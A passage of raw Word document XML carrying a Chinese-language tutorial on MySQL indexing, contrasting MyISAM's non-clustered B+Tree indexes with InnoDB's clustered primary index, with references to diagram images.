        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Col2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上建立一个辅助索引，则此索引的结构如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497CF0" w:rsidRPr="00F41A4C" w:rsidRDefault="00497CF0" w:rsidP="00497CF0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6324600" cy="5086350"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 2" descr="http://up.2cto.com/2012/1130/201211301112582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up.2cto.com/2012/1130/20121130111258238.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId218" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6324600" cy="5086350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497CF0" w:rsidRPr="00F41A4C" w:rsidRDefault="00497CF0" w:rsidP="00497CF0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497CF0" w:rsidRPr="00F41A4C" w:rsidRDefault="00497CF0" w:rsidP="00415540">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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同样也是一颗</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域保存数据记录的地址。因此，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中索引检索的算法为首先按照</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>搜索算法搜索索引，如果指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存在，则取出其</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域的值，然后以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域的值为地址，读取相应数据记录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00497CF0" w:rsidRPr="00F41A4C" w:rsidRDefault="00497CF0" w:rsidP="00497CF0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>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FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的索引方式也叫做</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非聚集</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的，之所以这么称呼是为了与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的聚集索引区分</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A489C" w:rsidRPr="00F41A4C" w:rsidRDefault="008A489C" w:rsidP="00895BB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A489C" w:rsidRPr="00F41A4C" w:rsidRDefault="008A489C" w:rsidP="008A489C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.1.1.2  Innodb</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0293E" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0293E" w:rsidP="00E12CE0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虽然</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作为索引结构，但具体实现方式却与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>截然不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0293E" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0293E" w:rsidP="00B0293E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一个重大区别是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的数据文件本身就是索引文件。从上文知道，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引文件和数据文件是分离的，索引文件仅保存数据记录的地址。而在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，表数据文件本身就是按</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>组织的一个索引结构，这棵树的</w:t>
      </w:r>
      <w:r w:rsidRPr="004E77A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>叶节点</w:t>
      </w:r>
      <w:r w:rsidRPr="004E77A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="004E77A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>域保存了完整的数据记录</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。这个索引的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是数据表的主键，因此</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表数据文件本身就是主索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0293E" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0293E" w:rsidP="00B0293E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5172075" cy="2295525"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="10" name="图片 5" descr="http://up.2cto.com/2012/1130/201211301112599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up.2cto.com/2012/1130/20121130111259913.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5172075" cy="2295525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E12CE0" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0293E" w:rsidP="00B0293E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上图是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>主索引（同时也是数据文件）的示意图，可以看到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>叶节点包含了完整的数据记录。这种索引叫做聚集索引。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的数据文件本身要按主键聚集，所以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>要求表必须有主键（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以没有），如果没有显式指定，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:hyperlink r:id="rId220" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="333333"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>系统</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会自动选择一个可以唯一标识数据记录的列作为主键，如果不存在这种列，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自动为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表生成一个隐含字段作为主键，这个字段长度为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字节，类型为长整形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0293E" w:rsidRPr="00F41A4C" w:rsidRDefault="00B0293E" w:rsidP="00B0293E">
      <w:pPr>
